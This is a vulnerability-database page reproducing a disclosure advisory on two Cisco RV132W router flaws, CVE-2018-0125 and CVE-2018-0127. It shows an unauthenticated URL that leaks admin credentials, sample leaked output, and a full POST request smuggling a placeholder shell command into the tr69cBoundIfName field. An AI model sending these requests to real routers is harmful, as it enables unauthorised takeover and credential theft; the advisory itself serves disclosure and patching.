CVE-2018-0125,CVE-2018-0127|Cisco RV132W Multiple... - VULHUB开源网络安全威胁库

Cisco RV132W Multiple... CVE-2018-0125,CVE-2018-0127

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in Cisco RV132W Wireless N VPN version 1.0.1.8 The Cisco RV132W Wireless-N ADSL2+ VPN Router is “easy to use, set up, and deploy. This flexible router offers great performance and is suited for small or home offices (SOHO) and smaller deployments.” The vulnerabilities found are: * Information Disclosure That Leads to Password Disclosure * Unauthenticated WAN Remote Code Execution ### Credit A security researcher from, NHSC, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program ### Vendor response Cisco were informed of the vulnerabilities and released patches to address them: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x CVE: CVE-2018-0125 / CVE-2018-0127 ### Vulnerabilities details #### Information Disclosure that Leads to Password Disclosure User controlled input is not sufficiently filtered, unauthenticated user can access the following page: ``` http://[TARGET_IP]/dumpmdm.cmd ``` The output will include the admin SSH password (base64) ``` <AdminUserName>redalert</AdminUserName> <AdminPassword>61eac78956b08e9b7c499691eddbe2e2</AdminPassword> <AdminPasswordHash>(null)</AdminPasswordHash> <AdminCliEnable>TRUE</AdminCliEnable> <SupportUserName>support</SupportUserName> <SupportPassword>support</SupportPassword> <SupportPasswordHash>(null)</SupportPasswordHash> <SupportCliEnable>TRUE</SupportCliEnable> <UserUserName>user</UserUserName> <UserPassword>user</UserPassword> <UserPasswordHash>(null)</UserPasswordHash> <UserCliEnable>TRUE</UserCliEnable> <logintimeout>30</logintimeout> <SetAdminUser>TRUE</SetAdminUser> <SetGuestUser>FALSE</SetGuestUser> <EnableAdminUser>TRUE</EnableAdminUser> <EnableGuestUser>FALSE</EnableGuestUser> <GuestUserName>guest</GuestUserName> <GuestPassword>574ea313a3b02211d193d01606942111</GuestPassword> <GuestPasswordHash>(null)</GuestPasswordHash> <GuestCliEnable>TRUE</GuestCliEnable> <GuestUserIsInUse>FALSE</GuestUserIsInUse> <FirstLogin>TRUE</FirstLogin> <GuestLoginTimeout>30</GuestLoginTimeout> <loginchecked>0</loginchecked> <sshpass>cmVkYWxlcnQxMzIkAA==</sshpass> ``` Decoding: “cmVkYWxlcnQxMzIkAA==” base64 decodes to “redalert132$” which is our test unit password. #### Unauthenticated WAN Remote Code Execution User controlled input is not sufficiently filtered, unauthenticated user can access the following page: ``` http://[TARGET_IP]/tr69cfg.cgi ``` By sending POST request with modify parameter tr69cBoundIfName= an unauthenticated user can execute arbitrary code on the victims router ``` POST /tr69cfg.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/2010010 1 Firefox/54.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 627 Referer: http://192.168.1.1/tr69cfg.cgi Connection: close Upgrade-Insecure-Requests: 1 submit_button=Basic_config&tr69cEnable=1&tr69cInformEnable=1&ipvEnable=0&tr69cInformInterval=300&tr69cAcsURL=http%3A%2F%2F192.168.1.1&tr69cAcsUser=admin&tr69cAcsPwd=admin&tr69cConnReqUser=admin&tr69cConnReqPwd=admin&tr69cConnReqPort=7547&tr69cNoneConnReqAuth=0&tr69cDebugEnable=0&tr69cAcsCert=&tr69cCpeCert=&downloadFileType=&tr69cBoundIfName=;COMMAND-TO-RUN;&tr69cBindInterface=ETH_WAN_R&tr69=on&ipv=on&inform=on&informInterval=300&httpCategory=http%3A%2F%2F&acsURL=192.168.1.1&acsUser=admin&acsPwd=admin&debug=on&FileType=on&connReqAuth=on&connReqUser=admin&connReqPwd=admin&connReqPort=7547&WANInterface=eth0.1 ```

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™

Cisco RV132W Multiple... CVE-2018-0125,CVE-2018-0127

漏洞利用/PoC

受影响的平台与产品

贡献用户

相关漏洞清单